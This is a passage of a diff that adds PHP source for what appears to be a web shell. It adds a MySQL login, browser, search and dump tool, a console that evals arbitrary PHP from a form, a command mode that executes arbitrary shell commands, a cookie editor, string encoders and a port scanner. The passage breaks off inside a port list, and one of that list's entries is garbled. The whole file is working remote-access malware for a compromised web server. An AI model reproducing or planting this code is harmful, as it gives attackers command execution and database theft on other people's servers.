+		{		print "\n".'<h2>MySQL connection</h2>';
+		print "\n".'<form action="'.DxURL('kill', '').'" method=GET align=center>';
+		DxGETinForm('leave', 'dxmode');
+		print "\n".'<br>Serv: <input type=text name="dxsql_s" value="localhost" style="width:200pt">';
+		print "\n".'<br>Login:<input type=text name="dxsql_l" value="" 	 	style="width:200pt">';
+		print "\n".'<br>Passw:<input type=password name="dxsql_p" value="" 	style="width:200pt">';
+		print "\n".'<br><input type=submit value="C0nnect" class="submit" style="width:200pt;"></form>';
+		die();
+		}
+	if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0))
+		die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+		else print '&gt;&gt; MySQL connected!';
+
+	$mysqlver=mysql_fetch_row(mysql_query("SELECT VERSION()"));
+	print str_repeat('&nbsp;',15).'MySQL version: <font class="highlight_txt">'.$mysqlver[0].'</font>';
+
+	DxMySQL_FetchResult(DxMySQLQ('SHOW DATABASES;', true), $DATABASES, true);
+	for ($i=0;$i<count($DATABASES);$i++)
+		$DATABASES[$i][1]=mysql_num_rows(DxMySQLQ('SHOW TABLES FROM `'.$DATABASES[$i][0].'`;', false));
+
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0>'
+				.'<tr><td class=h2_oneline><h1>DB:</h1></td>';
+	if (!isset($_GET['dxsql_d']))
+		{
+		print "\n".'<td class=h2_oneline style="border-width:0pt;">';
+		print "\n".'<form action="'.DxURL('kill', '').'" method=GET>';
+		DxGETinForm('leave', 'dxmode,dxsql_s,dxsql_l,dxsql_p');
+		print "\n".'<SELECT name="dxsql_d" onchange="this.form.submit()">';
+		print "\n\t".'<OPTION value="">&lt;Server&gt;</OPTION>';
+		for ($i=0;$i<count($DATABASES);$i++)
+		print "\n\t".'<OPTION value="'.$DATABASES[$i][0].'">'
+			.'['.DxZeroedNumber($DATABASES[$i][1],3).']'.' '.$DATABASES[$i][0]
+			.'</OPTION>';
+		print "\n".'</SELECT><input type=submit value="-&gt;" class=submit"></form></td>';
+		print "\n".'</tr></table>';
+		die();
+		}
+		else print "\n".'<td class=linelisting><font class=highlight_txt>'.((empty($_GET['dxsql_d']))?'&lt;Server&gt;':$_GET['dxsql_d']).'</font></td>'
+						.'<td class=linelisting><a href="'.DxURL('kill', 'dxsql_d').'" class=no>[CH]</a></td>'
+						.'<td class=linelisting><a href="'.DxURL('kill', 'dxmode').'&dxmode=SQLS" class=no>[Search in tables...]</a></td>'
+						.'<td class=linelisting><a href="'.DxURL('kill', 'dxmode').'&dxmode=SQLD" class=no>[Dump...]</a></td>'
+						.'</tr></table>';
+
+	if (!empty($_GET['dxsql_d']))
+		if (!mysql_select_db($_GET['dxsql_d']))
+			die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0 width=100%>';
+	print "\n".'<tr><td width=1% class=h2_oneline style="vertical-align:top;">';
+	if (!empty($_GET['dxsql_d']))
+		{
+		print "\n\t".'<table  border=0 cellspacing=0 cellpadding=0>';
+		print "\n\t".'<caption>Tables:</caption>';
+		DxMySQL_FetchResult(DxMySQLQ('SHOW TABLES;', true), $TABLES, true);
+		for ($i=0;$i<count($TABLES);$i++) $TABLES[$i]=$TABLES[$i][0];
+		asort($TABLES);
+		for ($i=0;$i<count($TABLES);$i++)
+			{
+			DxMySQL_FetchResult(DxMySQLQ('SELECT COUNT(*) FROM `'.$TABLES[$i].'`;', true), $TRowCnt, true);			print "\n\t".'<tr><td class="listing"><nobr>'.(($TRowCnt[0][0]>0)?'&gt; ':'&nbsp;&nbsp;').$TABLES[$i].'</td></tr>';
+			}
+		print "\n\t".'</table>';
+		}
+	print "\n".'</td><td  width=100%>';
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'[?] Can run several querys if divided by ";"<br>If smth is wrong with charset, write first: SET NAMES cp1251;';
+	print "\n".'<textarea name="dxsql_q" rows=10 style="width:100%;">'.((empty($_POST['dxsql_q']))?'':$_POST['dxsql_q']).'</textarea>';
+	print "\n".'<div align=right>'
+				.'<input type=submit value="Query" class="submit"> '
+				.'<input type=submit name="dxparam" value="Download Query" class="submit"></div></form>'
+				.'<br>';
+
+	if (empty($_POST['dxsql_q'])) die('</td></tr></table>');
+	$_POST['dxsql_q']=explode(';', $_POST['dxsql_q']);
+
+	foreach ($_POST['dxsql_q'] as $CUR_Q)
+		{		if (empty($CUR_Q)) continue;
+		$CUR_Q.=';';
+
+		$num=DxMySQL_FetchResult(DxMySQLQ($CUR_Q, true), $FETCHED, false);
+		if ($num<=0) continue;
+
+		print "\n\n\n".'<table border=0 cellspacing=0 cellpadding=0><caption>'.$CUR_Q.'</caption>';
+
+		$INDEXES=array_keys($FETCHED[0]);
+		print "\n\t".'<tr><td class="listing" colspan='.(count($INDEXES)+1).'>&gt;&gt; Fetched: '.$num. str_repeat('&nbsp;', 10). 'Affected: '.mysql_affected_rows().'</td></tr>';
+		print "\n\t".'<tr><td class="listing"><div align=center  class="highlight_txt">###</td>';
+		foreach ($INDEXES as $key) print '<td class="listing"><div align=center class="highlight_txt">'.$key.'</td>';
+		print '</tr>';
+
+		for ($l=0;$l<count($FETCHED);$l++)
+			{
+			print "\n\t".'<tr><td class="listing" width=40><div align=right class="highlight_txt">'.$l.'</td>';
+			for ($i=0; $i<count($INDEXES); $i++)
+				print '<td class="listing"> '.DxDecorVar($FETCHED[$l][ $INDEXES[$i] ], true).'</td>';
+			}
+
+		print "\n".'</table><br>';
+		}
+	print "\n".'</td></tr></table>';
+	}
+
+########
+########   SQL Search
+########
+if ($_GET['dxmode']=='SQLS')
+	{
+	if (!isset($_GET['dxsql_s'], $_GET['dxsql_l'], $_GET['dxsql_p'], $_GET['dxsql_d']))	die(DxError('SQL server/login/password/database are not set'));
+
+	if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0))
+		die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+		else print '&gt;&gt; MySQL connected!';
+
+	if (!mysql_select_db($_GET['dxsql_d']))
+		die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0><tr><td class=h2_oneline><h2>DB:</h2></td>';
+	print "\n".'<td class=linelisting><font class=highlight_txt>'.((empty($_GET['dxsql_d']))?'&lt;Server&gt;':$_GET['dxsql_d']).'</font></td></tr></table>';
+
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';	print "\n".'<table border=0 cellspacing=0 cellpadding=0 width=100%>';
+	print "\n".'<tr><td width=1% class=h2_oneline style="vertical-align:top;">';
+
+	DxMySQL_FetchResult(DxMySQLQ('SHOW TABLES;', true), $TABLES, true);
+	for ($i=0;$i<count($TABLES);$i++) $TABLES[$i]=$TABLES[$i][0];
+	asort($TABLES);
+
+	if (isset($_POST['dxsqlsearch']['txt']))
+		if (get_magic_quotes_gpc()==1) $_POST['dxsqlsearch']['txt']=stripslashes($_POST['dxsqlsearch']['txt']);
+
+	print "\n\t".'<SELECT MULTIPLE name="dxsqlsearch[tables][]" SIZE=30>';
+	for ($i=0;$i<count($TABLES);$i++)
+		{
+		DxMySQL_FetchResult(DxMySQLQ('SELECT COUNT(*) FROM `'.$TABLES[$i].'`;', true), $TRowCnt, true);
+		if ($TRowCnt[0][0]>0)
+			print "\n\t".'<OPTION value="'.$TABLES[$i].'" '
+				.(  (isset($_POST['dxsqlsearch']['tables']))?   ((in_array($TABLES[$i], $_POST['dxsqlsearch']['tables']))?'SELECTED':'')   :'SELECTED'  ).'>'
+				.$TABLES[$i].'</OPTION>';
+		}
+	print "\n\t".'</SELECT>';
+	print "\n".'</td><td  width=100%>';
+	print "\n".'<input type=text name="dxsqlsearch[txt]" style="width:100%;" value="'.((empty($_POST['dxsqlsearch']['txt']))?'':str_replace('"', '&quot;', $_POST['dxsqlsearch']['txt'])).'">';
+	print "\n".'<br>';
+	foreach (array('Any', 'Each', 'Exact', 'RegExp') as $cur_rad)
+		print '<input type=radio name="dxsqlsearch[mode]" value="'.strtolower($cur_rad).'" '
+			.(  (isset($_POST['dxsqlsearch']['mode']))?   (($_POST['dxsqlsearch']['mode']==strtolower($cur_rad))?'CHECKED':'')   :(($cur_rad=='Any')?'CHECKED':'')  )
+			.' class=radio>'.$cur_rad.'&nbsp;&nbsp;&nbsp;';
+	print "\n".'<div align=right><input type=submit value="Search..." class=submit style="width:100pt;"></div>';
+	print "\n".'</form>';
+
+	if (!isset($_POST['dxsqlsearch'])) die('</td></tr></table>');
+
+	if (empty($_POST['dxsqlsearch']['tables'])) die(DxError('No tables selected'));
+
+	if (in_array($_POST['dxsqlsearch']['mode'], array('any', 'each'))) $_POST['dxsqlsearch']['txt']=explode(' ', mysql_real_escape_string($_POST['dxsqlsearch']['txt']));
+		else $_POST['dxsqlsearch']['txt']=array($_POST['dxsqlsearch']['txt']);
+
+
+	$GLOBALFOUND=0;
+	foreach ($_POST['dxsqlsearch']['tables'] as $CUR_TABLE)
+		{		$Q='SELECT * FROM `'.$CUR_TABLE.'` WHERE ';
+		$Q_ARR=array();
+		DxMySQL_FetchResult(DxMySQLQ('SHOW COLUMNS FROM `'.$CUR_TABLE.'`;', true), $COLS, true);   for ($i=0; $i<count($COLS);$i++) $COLS[$i]=$COLS[$i][0];
+		foreach ($COLS as $CUR_COL)
+			{			if (in_array($_POST['dxsqlsearch']['mode'], array('any', 'each', 'exact')))
+				{				for ($i=0;$i<count($_POST['dxsqlsearch']['txt']);$i++)
+				$Q_ARR[]=$CUR_COL.' LIKE "%'.($_POST['dxsqlsearch']['txt'][$i]).'%"';
+				}
+				else $Q_ARR[]=$CUR_COL.' REGEXP '.$_POST['dxsqlsearch']['txt'][0];
+
+			if ($_POST['dxsqlsearch']['mode']=='each')
+				{				$Q_ARR_EXACT[]=implode(' AND ', $Q_ARR);
+				$Q_ARR=array();
+				}
+			}
+		if (in_array($_POST['dxsqlsearch']['mode'], array('any', 'exact'))) $Q.=implode(' OR ', $Q_ARR).';';
+		if ($_POST['dxsqlsearch']['mode']=='each') $Q.=' ( '.implode(' ) OR ( ', $Q_ARR_EXACT).' );';
+		if ($_POST['dxsqlsearch']['mode']=='regexp') $Q.=' ( '.implode(' ) OR ( ',$Q_ARR).' );';
+
+		/* $Q is ready */
+
+		if (($num=DxMySQL_FetchResult(DxMySQLQ($Q, true), $FETCHED, true))>0)
+			{
+			$GLOBALFOUND+=$num;			print "\n\n".'<table border=0 cellspacing=0 cellpadding=0 align=center><caption>'.$num.' matched in '.$CUR_TABLE.' :</caption>';
+			print "\n\t".'<tr><td class=listing><font class="highlight_txt">'.implode('</td><td class=listing><font class="highlight_txt">', $COLS).'</td></tr>';
+			for ($l=0;$l<count($FETCHED);$l++)
+				{
+				print "\n\t".'<tr>';
+				for ($i=0; $i<count($FETCHED[$l]); $i++) print '<td class="listing"> '.DxDecorVar($FETCHED[$l][$i], true).'</td>';
+				print '</tr>';
+				}
+			print "\n".'</table><br>';
+			}
+		}
+	print "\n".'<br>Total: '.$GLOBALFOUND.' matches';
+
+	print "\n".'</td></tr></table>';
+	}
+
+########
+########   SQL Dump
+########
+if ($_GET['dxmode']=='SQLD')
+	{	if (!isset($_GET['dxsql_s'], $_GET['dxsql_l'], $_GET['dxsql_p'], $_GET['dxsql_d']))	die(DxError('SQL server/login/password/database are not set'));
+
+	if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0))
+		die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+		else print '&gt;&gt; MySQL connected!';
+
+	if (!mysql_select_db($_GET['dxsql_d']))
+		die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0><tr><td class=h2_oneline><h2>DB:</h2></td>';
+	print "\n".'<td class=linelisting><font class=highlight_txt>'.((empty($_GET['dxsql_d']))?'&lt;Server&gt;':$_GET['dxsql_d']).'</font></td></tr></table>';
+
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0 width=100%>';
+	print "\n".'<tr><td width=1% class=h2_oneline style="vertical-align:top;">';
+
+	DxMySQL_FetchResult(DxMySQLQ('SHOW TABLES;', true), $TABLES, true);
+	for ($i=0;$i<count($TABLES);$i++) $TABLES[$i]=$TABLES[$i][0];
+	asort($TABLES);
+
+	print "\n\t".'<SELECT MULTIPLE name="dxsql_tables[]" SIZE=30>';
+	for ($i=0;$i<count($TABLES);$i++)
+		{
+		DxMySQL_FetchResult(DxMySQLQ('SELECT COUNT(*) FROM `'.$TABLES[$i].'`;', true), $TRowCnt, true);
+		if ($TRowCnt[0][0]>0)
+			print "\n\t".'<OPTION value="'.$TABLES[$i].'" SELECTED>'.$TABLES[$i].'</OPTION>';
+		}
+	print "\n\t".'</SELECT>';
+	print "\n".'</td><td  width=100%>You can set a pre-dump-query(s) (ex: SET NAMES cp1251; ):';
+	print "\n".'<input type=text name="dxsql_q" style="width:100%;">';
+	print "\n".'<br>';
+	print "\n".'<div align=right>'
+		.'GZIP <input type=checkbox name="dx_gzip" value="Yeah, baby">'.str_repeat('&nbsp;', 10)
+		.'<input type=submit value="Dump!" class=submit style="width:100pt;"></div>';
+	print "\n".'</form>';
+	}
+
+		###################################
+
+########
+########   PHP Console
+########
+if ($_GET['dxmode']=='PHP')
+	{
+	if (isset($_GET['dxval'])) $_POST['dxval']=$_GET['dxval'];
+
+	print "\n".'<table border=0 align=right><tr><td class=h2_oneline>Do</td><td class="linelisting">';
+	$PRESETS=array_keys($GLOB['VAR']['PHP']['Presets']);
+	for ($i=0; $i<count($PRESETS);$i++)
+		print "\n\t".'<a href="'.DxURL('leave', 'dxmode').'&dxval=dxpreset__'.$PRESETS[$i].'" class=no>['.$PRESETS[$i].']</a>'
+						.(  ($i==(count($PRESETS)-1))?'':str_repeat('&nbsp;',3)  );
+	print "\n\n".'</td></tr></table><br><br>';
+
+	if (isset($_POST['dxval']))
+		if (strpos($_POST['dxval'], 'dxpreset__')===0)
+			{			$_POST['dxval']=substr($_POST['dxval'], strlen('dxpreset__'));
+			if (!isset($GLOB['VAR']['PHP']['Presets'][$_POST['dxval']])) die(DxError('Undeclared preset'));
+			$_POST['dxval']=$GLOB['VAR']['PHP']['Presets'][$_POST['dxval']];
+			}
+
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<textarea name="dxval" rows=15 style="width:100%;">'.((isset($_POST['dxval']))?$_POST['dxval']:'').'</textarea>';
+	print "\n".'<div align=right><input type=submit value="Eval" class="submit" style="width:200pt;"></div>';
+	print "\n".'</form>';
+	if (isset($_POST['dxval']))
+		{		print str_repeat("\n", 10).'<!--php_eval-->'."\n\n".'<table border=0 width=100%><tr><td class=listing>'."\n\n";
+		eval($_POST['dxval']);
+		print str_repeat("\n", 10).'<!--/php_eval-->'.'</td></tr></table>';
+		}
+	}
+
+		###################################
+
+########
+########  Cookies Maintenance
+########
+if ($_GET['dxmode']=='COOK')
+	{
+	if ($DXGLOBALSHIT) DxWarning('Set cookie may fail. This is because "'.basename($_SERVER['PHP_SELF']).'" has fucked up the output with it\'s shit =(');	print 'Found <font class="highlight_txt">'.($CNT=count($_COOKIE)).' cookie'.(($CNT==1)?'':'s');
+
+	print "\n".'<div align=right><a href="'.DxURL('leave', '').'">[RELOAD]</a></div>';
+
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<table border=0 align=center><tr><td class=linelisting><div align=center><font class="highlight_txt">Cookie name</td><td class=linelisting><div align=center><font class="highlight_txt">Value</td></tr>';
+	for ($look_len=1, $maxlen=0; $look_len>=0;$look_len--)
+		{
+		if ($maxlen>100) $maxlen=100;
+		if ($maxlen<30) $maxlen=30;
+		$maxlen+=3;
+		for ($INDEXES=array_keys($_COOKIE), $i=0;$i<count($INDEXES);$i++)
+			{
+			if ($look_len) {if (strlen($_COOKIE[ $INDEXES[$i] ])>$maxlen) {$maxlen=strlen($_COOKIE[ $INDEXES[$i] ]);} continue;}
+			print "\n".'<tr><td class=linelisting>'.$INDEXES[$i].'</td>'
+					.'<td class=linelisting><input type=text '
+							.'name="dxparam['.str_replace(array('"', "\n", "\r", "\t"),  array('&quot;',' ',' ',' '), $INDEXES[$i]).']" '
+							.'value="'.str_replace(array('"', "\n", "\r", "\t"), array('&quot;',' ',' ',' '), $_COOKIE[ $INDEXES[$i] ]).'" '
+							.'SIZE='.$maxlen.'></td>'
+					.'</tr>';
+			}
+		if (!$look_len)
+			{
+			print "\n".'<tr><td colspan=2><div align=center>[Set new cookie]</td></tr>';
+			print "\n".'<tr><td class=linelisting><input type=text name="dxparam[DXS_NEWCOOK][NAM]" value="" style="width:99%;"></td>'
+					.'<td class=linelisting><input type=text name="dxparam[DXS_NEWCOOK][VAL]" value="" SIZE='.$maxlen.'></td>'
+					.'</tr>';			print "\n".'<tr><td class=linelisting colspan=2 style="text-align:center;">'
+					.'<input type=submit value="Save" class="submit" style="width:50%;">'
+					.'</td></tr>';
+			}
+		}
+	print "\n".'</table></form>';
+	}
+
+		###################################
+
+########
+########   Command line
+########
+if ($_GET['dxmode']=='CMD')
+	{
+	print "\n".'<table border=0 align=right><tr><td class=h2_oneline>Do</td><td>';
+	print "\n".'<SELECT name="selector" onchange="document.getElementById(\'dxval\').value+=document.getElementById(\'selector\').value+\'\n\'" style="width:200pt;">';
+	print "\n\t".'<OPTION></OPTION>';
+	$PRESETS=array_keys($GLOB['VAR']['CMD']['Presets']);
+	for ($i=0; $i<count($PRESETS);$i++)
+		print "\n\t".'<OPTION value="'.str_replace('"','&quot;',$GLOB['VAR']['CMD']['Presets'][ $PRESETS[$i] ]).'">'.$PRESETS[$i].'</OPTION>';
+	print "\n\n".'</SELECT></td></tr></table><br><br>';
+
+	if (isset($_POST['dxval']))
+		if (strpos($_POST['dxval'], 'dxpreset__')===0)
+			{
+			$_POST['dxval']=substr($_POST['dxval'], strlen('dxpreset__'));
+			if (!isset($GLOB['VAR']['CMD']['Presets'][$_POST['dxval']])) die(DxError('Undeclared preset'));
+			$_POST['dxval']=$GLOB['VAR']['CMD']['Presets'][$_POST['dxval']];
+			}
+
+	$warnstr=DxExecNahuj('',$trash1, $trash2);
+	if (!$warnstr[1]) DxWarning($warnstr[2]);	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<textarea name="dxval" rows=5 style="width:100%;">'.((isset($_POST['dxval']))?$_POST['dxval']:'').'</textarea>';
+	print "\n".'<div align=right>'
+				.'<input type=submit value="Exec" class="submit" style="width:100pt;"> '
+				.'</div>';
+	print "\n".'</form>';
+	if (isset($_POST['dxval']))
+		{
+		$_POST['dxval']=split("\n", str_replace("\r", '', $_POST['dxval']));
+		for ($i=0; $i<count($_POST['dxval']); $i++)
+			{
+			$CUR=$_POST['dxval'][$i];
+			if (empty($CUR)) continue;
+
+			DxExecNahuj($CUR,$OUT, $RET);
+			print str_repeat("\n", 10).'<!--'.$warnstr[2].'("'.$CUR.'")-->'."\n\n".'<table border=0 width=100%><tr><td class=listing>'."\n\n";
+
+			print '<span style="position:absolute;left:10%;" class="highlight_txt">Return</span>';
+			print '<span style="position:absolute;right:30%;" class="highlight_txt">Output</span>';
+			print '<br><nobr>';
+			print "\n".'<textarea rows=10 style="width:20%;display:inline;">'.$CUR."\n\n".(	(is_array($RET))?implode("\n", $RET):$RET).'</textarea>';
+			print "\n".'<textarea rows=10 style="width:79%;display:inline;">'."\n".(	(is_array($OUT))?implode("\n", $OUT):$OUT).'</textarea>';
+			print '</nobr>';
+			print str_repeat("\n", 10).'<!--/'.$warnstr[2].'("'.$CUR.'")-->'."\n\n".'</td></tr></table>';
+			}
+		}
+	}
+
+		###################################
+
+########
+########   String functions
+########
+if ($_GET['dxmode']=='STR')
+	{
+	if (isset($_POST['dxval'], $_POST['dxparam']))
+		{		$crypted='';
+		if ($_POST['dxparam']=='md5') $crypted.=md5($_POST['dxval']);
+		if ($_POST['dxparam']=='sha1') $crypted.=sha1($_POST['dxval']);
+		if ($_POST['dxparam']=='crc32') $crypted.=crc32($_POST['dxval']);
+		if ($_POST['dxparam']=='2base') $crypted.=base64_encode($_POST['dxval']);
+		if ($_POST['dxparam']=='base2') $crypted.=base64_decode($_POST['dxval']);
+		if ($_POST['dxparam']=='2HEX') for ($i=0;$i<strlen($_POST['dxval']);$i++) $crypted.=strtoupper(dechex(ord($_POST['dxval'][$i]))).' ';
+		if ($_POST['dxparam']=='HEX2') {$_POST['dxval']=str_replace(' ','',$_POST['dxval']); for ($i=0;$i<strlen($_POST['dxval']);$i+=2) $crypted.=chr(hexdec($_POST['dxval'][$i].$_POST['dxval'][$i+1]));}
+		if ($_POST['dxparam']=='2DEC') {$crypted='CHAR('; for ($i=0;$i<strlen($_POST['dxval']); $i++) $crypted.=ord($_POST['dxval'][$i]).(($i<(strlen($_POST['dxval'])-1))?',':')');}
+		if ($_POST['dxparam']=='2URL') $crypted.=urlencode($_POST['dxval']);
+		if ($_POST['dxparam']=='URL2') $crypted.=urldecode($_POST['dxval']);
+		}
+	if (isset($crypted)) print $_POST['dxparam'].'(<font class="highlight_txt"> '.$_POST['dxval'].' </font>) = ';
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<textarea name="dxval" rows=20 style="width:100%;">'.((isset($crypted))?$crypted:'').'</textarea>';
+	print "\n".'<div align=right>'
+		.'<input type=submit name="dxparam" value="md5" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="sha1" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="crc32" class="submit" style="width:50pt;"> '.str_repeat('&nbsp;', 5)
+		.'<input type=submit name="dxparam" value="2base" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="base2" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="2HEX" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="HEX2" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="2DEC" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="2URL" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="URL2" class="submit" style="width:50pt;"> '
+		.'</div>';
+	print "\n".'</form>';
+	}
+
+########
+########   Port scaner
+########
+if ($_GET['dxmode']=='PRT')
+	{
+	print '[!] For complete portlist go to <a href="http://www.iana.org/assignments/port-numbers" target=_blank>http://www.iana.org/assignments/port-numbers</a>';	if (isset($_POST['dxportscan']) or isset($_GET['dxparam']))
+		$DEF_PORTS=array (1=>'tcpmux (TCP Port Service Multiplexer)',2=>'Management Utility',3=>'Compression Process',5=>'rje (Remote Job Entry)',7=>'echo',9=>'discard',11=>'systat',13=>'daytime',15=>'netstat',17=>'quote of the day',18=>'send/rwp',19=>'character generator',20=>'ftp-data',21=>'ftp',22=>'ssh, pcAnywhere',23=>'Telnet',25=>'SMTP (Simple Mail Transfer)',27=>'ETRN (NSW User System FE)',29=>'MSG ICP',31=>'MSG Authentication',33=>'dsp (Display Support Protocol)',37=>'time',38=>'RAP (Route Access Protocol)',39=>'rlp (Resource Location Protocol)',41=>'Graphics',42=>'nameserv, WINS',43=>'whois, nickname',44=>'MPM FLAGS Protocol',45=>'Message Processing Module [recv]',46=>'MPM [default send]',47=>'NI FTP',48=>'Digital Audit Daemon',49=>'TACACS, Login Host Protocol',50=>'RMCP, re-mail-ck',53=>'DNS',57=>'MTP (any private terminal access)',59=>'NFILE',60=>'Unassigned',61=>'NI MAIL',62=>'ACA Services',63=>'whois++',64=>'Communications Integrator (CI)',65=>'TACACS-Database Service',66=>'Oracle SQL*NET',67=>'bootps (Bootstrap Protocol Server)',68=>'bootpd/dhcp (Bootstrap Protocol Client)',69=>'Trivial File Transfer Protocol (tftp)',70=>'Gopher',71=>'Remote Job Service',72=>'Remote Job Service',73=>'Remote Job Service',74=>'Remote Job Service',75=>'any private dial out service',76=>'Distributed External Object Store',77=>'any private RJE service',78=>'vettcp',79=>'finger',80=>'World Wide Web HTTP',81=>'HOSTS2 Name Serve',82=>'XFER Utility',83=>'MIT ML Device',84=>'Common Trace Facility',85=>'MIT ML Device',86=>'Micro Focus Cobol',87=>'any private terminal link',88=>'Kerberos, WWW',89=>'SU/MIT Telnet Gateway',90=>'DNSIX Securit Attribute Token Map',91=>'MIT Dover Spooler',92=>'Network Printing Protocol',93=>'Device Control Protocol',94=>'Tivoli Object Dispatcher',95=>'supdup',96=>'DIXIE',98=>'linuxconf',99=>'Metagram Relay',100=>'[unauthorized use]',101=>'HOSTNAME',102=>'ISO, X.400, ITOT',103=>'Genesis Point-to&#14144;&#429;oi&#65535;&#65535; T&#0;&#0;ns&#0;&#0;et',104=>'ACR-NEMA Digital Imag. & Comm. 300',105=>'CCSO name server protocol',106=>'poppassd',107=>'Remote Telnet Service',108=>'SNA Gateway Access Server',109=>'POP2',110=>'POP3',111=>'Sun RPC Portmapper',112=>'McIDAS Data Transmission Protocol',113=>'Authentication Service',115=>'sftp (Simple File Transfer Protocol)',116=>'ANSA REX Notify',117=>'UUCP Path Service',118=>'SQL Services',119=>'NNTP',120=>'CFDP',123=>'NTP',124=>'SecureID',129=>'PWDGEN',133=>'statsrv',135=>'loc-srv/epmap',137=>'netbios-ns',138=>'netbios-dgm (UDP)',139=>'NetBIOS',143=>'IMAP',144=>'NewS',150=>'SQL-NET',152=>'BFTP',153=>'SGMP',156=>'SQL Service',161=>'SNMP',175=>'vmnet',177=>'XDMCP',178=>'NextStep Window Server',179=>'BGP',180=>'SLmail admin',199=>'smux',210=>'Z39.50',213=>'IPX',218=>'MPP',220=>'IMAP3',256=>'RAP',257=>'Secure Electronic Transaction',258=>'Yak Winsock Personal Chat',259=>'ESRO',264=>'FW1_topo',311=>'Apple WebAdmin',350=>'MATIP type A',351=>'MATIP type B',363=>'RSVP tunnel',366=>'ODMR (On-Demand Mail Relay)',371=>'Clearcase',387=>'AURP (AppleTalk Update-Based Routing Protocol)',389=>'LDAP',407=>'Timbuktu',427=>'Server Location',434=>'Mobile IP',443=>'ssl',444=>'snpp, Simple Network Paging Protocol',445=>'SMB',458=>'QuickTime TV/Conferencing',468=>'Photuris',475=>'tcpnethaspsrv',500=>'ISAKMP, pluto',511=>'mynet-as',512=>'biff, rexec',513=>'who, rlogin',514=>'syslog, rsh',515=>'lp, lpr, line printer',517=>'talk',520=>'RIP (Routing Information Protocol)',521=>'RIPng',522=>'ULS',531=>'IRC',543=>'KLogin, AppleShare over IP',545=>'QuickTime',548=>'AFP',554=>'Real Time Streaming Protocol',555=>'phAse Zero',563=>'NNTP over SSL',575=>'VEMMI',581=>'Bundle Discovery Protocol',593=>'MS-RPC',608=>'SIFT/UFT',626=>'Apple ASIA',631=>'IPP (Internet Printing Protocol)',635=>'RLZ DBase',636=>'sldap',642=>'EMSD',648=>'RRP (NSI Registry Registrar Protocol)',655=>'tinc',660=>'Apple MacOS Server Admin',666=>'Doom',674=>'ACAP',687=>'AppleShare IP Registry',700=>'buddyphone',705=>'AgentX for SNMP',901=>'swat, realsecure',993=>'s-imap',995=>'s-pop',1024=>'Reserved',1025=>'network blackjack',1062=>'Veracity',1080=>'SOCKS',1085=>'WebObjects',1227=>'DNS2Go',1243=>'SubSeven',1338=>'Millennium Worm',1352=>'Lotus Notes',1381=>'Apple Network License Manager',1417=>'Timbuktu Service 1 Port',1418=>'Timbuktu Service 2 Port',1419=>'Timbuktu Service 3 Port',1420=>'Timbuktu Service 4 Port',1433=>'Microsoft SQL Server',1434=>'Microsoft SQL Monitor',1477=>'ms-sna-server',1478=>'ms-sna-base',1490=>'insitu-conf',1494=>'Citrix ICA Protocol',1498=>'Watcom-SQL',1500=>'VLSI License Manager',1503=>'T.120',1521=>'Oracle SQL',1522=>'Ricardo North America License Manager',1524=>'ingres',1525=>'prospero',1526=>'prospero',1527=>'tlisrv',1529=>'oracle',1547=>'laplink',1604=>'Citrix ICA, MS Terminal Server',1645=>'RADIUS Authentication',1646=>'RADIUS Accounting',1680=>'Carbon Copy',1701=>'L2TP/LSF',1717=>'Convoy',1720=>'H.323/Q.931',1723=>'PPTP control port',1731=>'MSICCP',1755=>'Windows Media .asf',1758=>'TFTP multicast',1761=>'cft-0',1762=>'cft-1',1763=>'cft-2',1764=>'cft-3',1765=>'cft-4',1766=>'cft-5',1767=>'cft-6',1808=>'Oracle-VP2',1812=>'RADIUS server',1813=>'RADIUS accounting',1818=>'ETFTP',1973=>'DLSw DCAP/DRAP',1985=>'HSRP',1999=>'Cisco AUTH',2001=>'glimpse',2049=>'NFS',2064=>'distributed.net',2065=>'DLSw',2066=>'DLSw',2106=>'MZAP',2140=>'DeepThroat',2301=>'Compaq Insight Management Web Agents',2327=>'Netscape Conference',2336=>'Apple UG Control',2427=>'MGCP gateway',2504=>'WLBS',2535=>'MADCAP',2543=>'sip',2592=>'netrek',2727=>'MGCP call agent',2628=>'DICT',2998=>'ISS Real Secure Console Service Port',3000=>'Firstclass',3001=>'Redwood Broker',3031=>'Apple AgentVU',3128=>'squid',3130=>'ICP',3150=>'DeepThroat',3264=>'ccmail',3283=>'Apple NetAssitant',3288=>'COPS',3305=>'ODETTE',3306=>'mySQL',3389=>'RDP Protocol (Terminal 